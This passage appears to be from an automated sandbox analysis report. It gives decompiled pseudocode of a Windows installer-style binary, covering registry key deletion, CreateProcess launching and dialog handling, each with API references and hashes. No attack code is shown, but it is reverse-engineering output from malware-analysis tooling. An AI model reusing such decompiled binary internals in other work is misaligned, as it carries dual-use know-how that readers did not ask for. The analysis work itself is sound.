                                                                                                                          								return GlobalFree(_a8);
                                                                                                                          							}
                                                                                                                          							if(__eflags < 0) {
                                                                                                                          								L47:
                                                                                                                          								__eflags = 0;
                                                                                                                          								L48:
                                                                                                                          								_t49 = 1;
                                                                                                                          								goto L55;
                                                                                                                          							}
                                                                                                                          							__eflags = _t91 - _t78;
                                                                                                                          							if(_t91 < _t78) {
                                                                                                                          								goto L47;
                                                                                                                          							}
                                                                                                                          							goto L54;
                                                                                                                          						}
                                                                                                                          						_t86 = _t88;
                                                                                                                          						_t49 = E10002BF0(_t91, _t78, _t86);
                                                                                                                          						goto L56;
                                                                                                                          					}
                                                                                                                          					_t58 = _t48 - 1;
                                                                                                                          					__eflags = _t58;
                                                                                                                          					if(_t58 == 0) {
                                                                                                                          						__eflags = _t91 - _t78;
                                                                                                                          						if(_t91 != _t78) {
                                                                                                                          							goto L54;
                                                                                                                          						}
                                                                                                                          						__eflags = _t88 - _v8;
                                                                                                                          						if(_t88 != _v8) {
                                                                                                                          							goto L54;
                                                                                                                          						}
                                                                                                                          						goto L47;
                                                                                                                          					}
                                                                                                                          					_t59 = _t58 - 1;
                                                                                                                          					__eflags = _t59;
                                                                                                                          					if(_t59 == 0) {
                                                                                                                          						__eflags =  *((char*)(_t82 + 1)) - 0x3e;
                                                                                                                          						if( *((char*)(_t82 + 1)) != 0x3e) {
                                                                                                                          							__eflags = _t88 - _v8;
                                                                                                                          							if(__eflags < 0) {
                                                                                                                          								goto L54;
                                                                                                                          							}
                                                                                                                          							if(__eflags > 0) {
                                                                                                                          								goto L47;
                                                                                                                          							}
                                                                                                                          							__eflags = _t91 - _t78;
                                                                                                                          							if(_t91 <= _t78) {
                                                                                                                          								goto L54;
                                                                                                                          							}
                                                                                                                          							goto L47;
                                                                                                                          						}
                                                                                                                          						_t86 = _t88;
                                                                                                                          						_t49 = E10002C10(_t91, _t78, _t86);
                                                                                                                          						goto L56;
                                                                                                                          					}
                                                                                                                          					_t61 = _t59 - 0x20;
                                                                                                                          					__eflags = _t61;
                                                                                                                          					if(_t61 == 0) {
                                                                                                                          						_t91 = _t91 ^ _t78;
                                                                                                                          						_t88 = _t88 ^ _v8;
                                                                                                                          						goto L57;
                                                                                                                          					}
                                                                                                                          					_t62 = _t61 - 0x1e;
                                                                                                                          					__eflags = _t62;
                                                                                                                          					if(_t62 == 0) {
                                                                                                                          						__eflags =  *((char*)(_t82 + 1)) - 0x7c;
                                                                                                                          						if( *((char*)(_t82 + 1)) != 0x7c) {
                                                                                                                          							_t91 = _t91 | _t78;
                                                                                                                          							_t88 = _t88 | _v8;
                                                                                                                          							goto L57;
                                                                                                                          						}
                                                                                                                          						__eflags = _t91 | _t88;
                                                                                                                          						if((_t91 | _t88) != 0) {
                                                                                                                          							goto L47;
                                                                                                                          						}
                                                                                                                          						__eflags = _t78 | _v8;
                                                                                                                          						if((_t78 | _v8) != 0) {
                                                                                                                          							goto L47;
                                                                                                                          						}
                                                                                                                          						goto L54;
                                                                                                                          					}
                                                                                                                          					__eflags = _t62 == 0;
                                                                                                                          					if(_t62 == 0) {
                                                                                                                          						_t91 =  !_t91;
                                                                                                                          						_t88 =  !_t88;
                                                                                                                          					}
                                                                                                                          					goto L57;
                                                                                                                          				}
                                                                                                                          				if(_t102 == 0) {
		L21:
		__eflags = _t78 | _v8;
		if((_t78 | _v8) != 0) {
			_v20 = E10002A80(_t91, _t88, _t78, _v8);
			_v16 = _t86;
			_t49 = E10002B30(_t91, _t88, _t78, _v8);
			_t82 = _a8;
		} else {
			_v20 = _v20 & 0x00000000;
			_v16 = _v16 & 0x00000000;
			_t49 = _t91;
			_t86 = _t88;
		}
		__eflags =  *_t82 - 0x2f;
		if( *_t82 != 0x2f) {
			goto L56;
		} else {
			_t91 = _v20;
			_t88 = _v16;
			goto L57;
		}
	}
	_t68 = _t47 - 0x21;
	if(_t68 == 0) {
		_t49 = 0;
		__eflags = _t91 | _t88;
		if((_t91 | _t88) != 0) {
			goto L55;
		}
		goto L48;
	}
	_t69 = _t68 - 4;
	if(_t69 == 0) {
		goto L21;
	}
	_t70 = _t69 - 1;
	if(_t70 == 0) {
		__eflags =  *((char*)(_t82 + 1)) - 0x26;
		if( *((char*)(_t82 + 1)) != 0x26) {
			_t91 = _t91 & _t78;
			_t88 = _t88 & _v8;
			goto L57;
		}
		__eflags = _t91 | _t88;
		if((_t91 | _t88) == 0) {
			goto L54;
		}
		__eflags = _t78 | _v8;
		if((_t78 | _v8) == 0) {
			goto L54;
		}
		goto L47;
	}
	_t71 = _t70 - 4;
	if(_t71 == 0) {
		_t49 = E10002A40(_t91, _t88, _t78, _v8);
		goto L56;
	} else {
		_t72 = _t71 - 1;
		if(_t72 == 0) {
			_t91 = _t91 + _t78;
			asm("adc edi, [ebp-0x4]");
		} else {
			if(_t72 == 0) {
				_t91 = _t91 - _t78;
				asm("sbb edi, [ebp-0x4]");
			}
		}
		goto L57;
	}
}


























                                                                                                                          0x00000000
                                                                                                                          0x10001b6b

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                            • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001B41
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001CCD
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001CD2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeGlobal$lstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 176019282-0
                                                                                                                          • Opcode ID: 16e7fc8dfb2109add019363551953530b2221b6c08ce197826e595f4a50a0593
                                                                                                                          • Instruction ID: ec181f717125864b891e508b79773b0a6be540bcfc5555760108aa08b7b6b632
                                                                                                                          • Opcode Fuzzy Hash: 16e7fc8dfb2109add019363551953530b2221b6c08ce197826e595f4a50a0593
                                                                                                                          • Instruction Fuzzy Hash: DD510332D84159EBFB22CFA48880EEDB7E5EF812C4FA24159E801A311DD771EE009B52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E00402A36(void* _a4, char* _a8, long _a12) {
                                                                                                                          				void* _v8;
                                                                                                                          				char _v272;
                                                                                                                          				signed char _t16;
                                                                                                                          				long _t18;
                                                                                                                          				long _t25;
                                                                                                                          				intOrPtr* _t27;
                                                                                                                          				long _t28;
                                                                                                                          
                                                                                                                          				_t16 =  *0x423f30; // 0x0
                                                                                                                          				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                                                                                                                          				if(_t18 == 0) {
                                                                                                                          					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                                                          						__eflags = _a12;
                                                                                                                          						if(_a12 != 0) {
                                                                                                                          							RegCloseKey(_v8);
                                                                                                                          							L8:
                                                                                                                          							__eflags = 1;
                                                                                                                          							return 1;
                                                                                                                          						}
                                                                                                                          						_t25 = E00402A36(_v8,  &_v272, 0);
                                                                                                                          						__eflags = _t25;
                                                                                                                          						if(_t25 != 0) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					RegCloseKey(_v8);
                                                                                                                          					_t27 = E00405CFF(2);
                                                                                                                          					if(_t27 == 0) {
                                                                                                                          						__eflags =  *0x423f30; // 0x0
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							goto L8;
                                                                                                                          						}
                                                                                                                          						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                                                                          						__eflags = _t28;
                                                                                                                          						if(_t28 != 0) {
                                                                                                                          							goto L8;
                                                                                                                          						}
                                                                                                                          						return _t28;
                                                                                                                          					}
                                                                                                                          					return  *_t27(_a4, _a8,  *0x423f30, 0);
                                                                                                                          				}
                                                                                                                          				return _t18;
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A57
                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1912718029-0
                                                                                                                          • Opcode ID: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                                                                                                          • Instruction ID: 582bceb6e4b24316922a1ee6e85d565da044e62c79b522cd3b8563d0d5e38007
                                                                                                                          • Opcode Fuzzy Hash: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                                                                                                          • Instruction Fuzzy Hash: E7111771A10049BEEF31AF90DE49DAF7B7DEB44345B104036F906A10A0DBB49E51AF69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00401CC1(int __edx) {
                                                                                                                          				void* _t17;
                                                                                                                          				struct HINSTANCE__* _t21;
                                                                                                                          				struct HWND__* _t25;
                                                                                                                          				void* _t27;
                                                                                                                          
                                                                                                                          				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                                                                                                          				GetClientRect(_t25, _t27 - 0x40);
                                                                                                                          				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                                                                                          				if(_t17 != _t21) {
                                                                                                                          					DeleteObject(_t17);
                                                                                                                          				}
                                                                                                                          				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t27 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00401CC5
                                                                                                                          • GetClientRect.USER32 ref: 00401CD2
                                                                                                                          • LoadImageA.USER32 ref: 00401CF3
                                                                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: aab1ff915591a61a6dff0f8bf18086dee3b735981cb00012526b248d1bc18b45
                                                                                                                          • Instruction ID: c9eade559dcb8dabe12f7fb8fefc2ecb3bb817c4e851fb83d30c8e131ed4808d
                                                                                                                          • Opcode Fuzzy Hash: aab1ff915591a61a6dff0f8bf18086dee3b735981cb00012526b248d1bc18b45
                                                                                                                          • Instruction Fuzzy Hash: B5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E00404568(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                                          				char _v36;
                                                                                                                          				char _v68;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t26;
                                                                                                                          				void* _t34;
                                                                                                                          				signed int _t36;
                                                                                                                          				signed int _t39;
                                                                                                                          				unsigned int _t46;
                                                                                                                          
                                                                                                                          				_t46 = _a12;
                                                                                                                          				_push(0x14);
                                                                                                                          				_pop(0);
                                                                                                                          				_t34 = 0xffffffdc;
                                                                                                                          				if(_t46 < 0x100000) {
                                                                                                                          					_push(0xa);
                                                                                                                          					_pop(0);
                                                                                                                          					_t34 = 0xffffffdd;
                                                                                                                          				}
                                                                                                                          				if(_t46 < 0x400) {
                                                                                                                          					_t34 = 0xffffffde;
                                                                                                                          				}
                                                                                                                          				if(_t46 < 0xffff3333) {
                                                                                                                          					_t39 = 0x14;
                                                                                                                          					asm("cdq");
                                                                                                                          					_t46 = _t46 + 1 / _t39;
                                                                                                                          				}
                                                                                                                          				_push(E004059FF(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                                                                                          				_push(E004059FF(_t34, 0, _t46,  &_v68, _t34));
                                                                                                                          				_t21 = _t46 & 0x00ffffff;
                                                                                                                          				_t36 = 0xa;
                                                                                                                          				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                                                                                          				_push(_t46 >> 0);
                                                                                                                          				_t26 = E004059FF(_t34, 0, 0x420478, 0x420478, _a8);
                                                                                                                          				wsprintfA(_t26 + lstrlenA(0x420478), "%u.%u%s%s");
                                                                                                                          				return SetDlgItemTextA( *0x423658, _a4, 0x420478);
                                                                                                                          			}














                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00420478,00420478,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404488,000000DF,0000040F,00000400,00000000), ref: 004045F6
                                                                                                                          • wsprintfA.USER32 ref: 004045FE
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00404611
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                          • Opcode ID: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                                                                                                          • Instruction ID: de100ae33fd703a766e80fabf1c0ef7e237f6bef08e04a4196497c65211e5d03
                                                                                                                          • Opcode Fuzzy Hash: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                                                                                                          • Instruction Fuzzy Hash: 331104B370012477DB10666D9C05EAF329DDBC6334F14023BFA2AF61D1E9388C1186E8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E00401BAD() {
                                                                                                                          				signed int _t28;
                                                                                                                          				CHAR* _t31;
                                                                                                                          				long _t32;
                                                                                                                          				int _t37;
                                                                                                                          				signed int _t38;
                                                                                                                          				int _t42;
                                                                                                                          				int _t48;
                                                                                                                          				struct HWND__* _t52;
                                                                                                                          				void* _t55;
                                                                                                                          
                                                                                                                          				 *(_t55 - 0x34) = E004029D9(3);
                                                                                                                          				 *(_t55 + 8) = E004029D9(4);
                                                                                                                          				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                                                                                                          					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
                                                                                                                          				}
                                                                                                                          				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                                                                                                          				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                                                                                                          					 *(_t55 + 8) = E004029F6(0x44);
                                                                                                                          				}
                                                                                                                          				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                                                                                                          				_push(1);
                                                                                                                          				if(__eflags != 0) {
                                                                                                                          					_t50 = E004029F6();
                                                                                                                          					_t28 = E004029F6();
                                                                                                                          					asm("sbb ecx, ecx");
                                                                                                                          					asm("sbb eax, eax");
                                                                                                                          					_t31 =  ~( *_t27) & _t50;
                                                                                                                          					__eflags = _t31;
                                                                                                                          					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                                                                                          					goto L10;
                                                                                                                          				} else {
                                                                                                                          					_t52 = E004029D9();
                                                                                                                          					_t37 = E004029D9();
                                                                                                                          					_t48 =  *(_t55 - 0x10) >> 2;
                                                                                                                          					if(__eflags == 0) {
                                                                                                                          						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                                                                                                                          						L10:
                                                                                                                          						 *(_t55 - 8) = _t32;
                                                                                                                          					} else {
                                                                                                                          						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                                                                                                          				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                                                                                                          					_push( *(_t55 - 8));
                                                                                                                          					E0040593B();
                                                                                                                          				}
                                                                                                                          				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t55 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                                                          • Instruction ID: 089b6e11c3ee5c2ceb15467343933f82bc3488a694e04e66c57418204d538f9a
                                                                                                                          • Opcode Fuzzy Hash: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                                                          • Instruction Fuzzy Hash: B321C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040523D(CHAR* _a4) {
                                                                                                                          				struct _PROCESS_INFORMATION _v20;
                                                                                                                          				int _t7;
                                                                                                                          
                                                                                                                          				0x422480->cb = 0x44;
                                                                                                                          				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422480,  &_v20);
                                                                                                                          				if(_t7 != 0) {
                                                                                                                          					CloseHandle(_v20.hThread);
                                                                                                                          					return _v20.hProcess;
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422480,Error launching installer), ref: 00405262
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040526F
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040523D
                                                                                                                          • Error launching installer, xrefs: 00405250
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                                          • API String ID: 3712363035-4043152584
                                                                                                                          • Opcode ID: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                                                          • Instruction ID: 0a3d69d2a3401d9d63374a1600280413a6fd3692a6ba6d2da32d4f839eaa01ec
                                                                                                                          • Opcode Fuzzy Hash: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                                                          • Instruction Fuzzy Hash: BEE0E674A1010ABBDB00EF64DD09D6B7B7CFB00304B408621E911E2150D774E4108A79
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004054D0(CHAR* _a4) {
                                                                                                                          				CHAR* _t7;
                                                                                                                          
                                                                                                                          				_t7 = _a4;
                                                                                                                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                                                          					lstrcatA(_t7, 0x409010);
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054D6
                                                                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054DF
                                                                                                                          • lstrcatA.KERNEL32(?,00409010), ref: 004054F0
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004054D0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 2659869361-3936084776
                                                                                                                          • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                          • Instruction ID: 18d73bba3a4f2c077241afd2b81ba446c35da1b9bd2d8ef2eba9fb39a34af30a
                                                                                                                          • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                          • Instruction Fuzzy Hash: 09D0A7B2505970AED20126195C05FCF2A08CF023117044423F640B21D2C63C5C819BFD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E00401EC5(char __ebx, char* __edi, char* __esi) {
                                                                                                                          				char* _t18;
                                                                                                                          				int _t19;
                                                                                                                          				void* _t30;
                                                                                                                          
                                                                                                                          				_t18 = E004029F6(0xffffffee);
                                                                                                                          				 *(_t30 - 0x2c) = _t18;
                                                                                                                          				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                                                                                                                          				 *__esi = __ebx;
                                                                                                                          				 *(_t30 - 8) = _t19;
                                                                                                                          				 *__edi = __ebx;
                                                                                                                          				 *((intOrPtr*)(_t30 - 4)) = 1;
                                                                                                                          				if(_t19 != __ebx) {
                                                                                                                          					__eax = GlobalAlloc(0x40, __eax);
                                                                                                                          					 *(__ebp + 8) = __eax;
                                                                                                                          					if(__eax != __ebx) {
                                                                                                                          						if(__eax != 0) {
                                                                                                                          							__ebp - 0x44 = __ebp - 0x34;
                                                                                                                          							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
                                                                                                                          								 *(__ebp - 0x34) = E0040593B(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                                                                                                          								 *(__ebp - 0x34) = E0040593B(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                                                                                                          								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_push( *(__ebp + 8));
                                                                                                                          						GlobalFree();
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t30 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                                          • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                                            • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404258612-0
                                                                                                                          • Opcode ID: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                                                                                                          • Instruction ID: 4f4abe4324f754641e01f0e672b51484e064b7e428c6eed24e296c4d37409401
                                                                                                                          • Opcode Fuzzy Hash: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                                                                                                          • Instruction Fuzzy Hash: 5F114CB2901109BFDB01EFA5D981DAEBBB9EF04354B20803AF501F61E1D7389A55DB28
                                                                                                                          Uniqueness

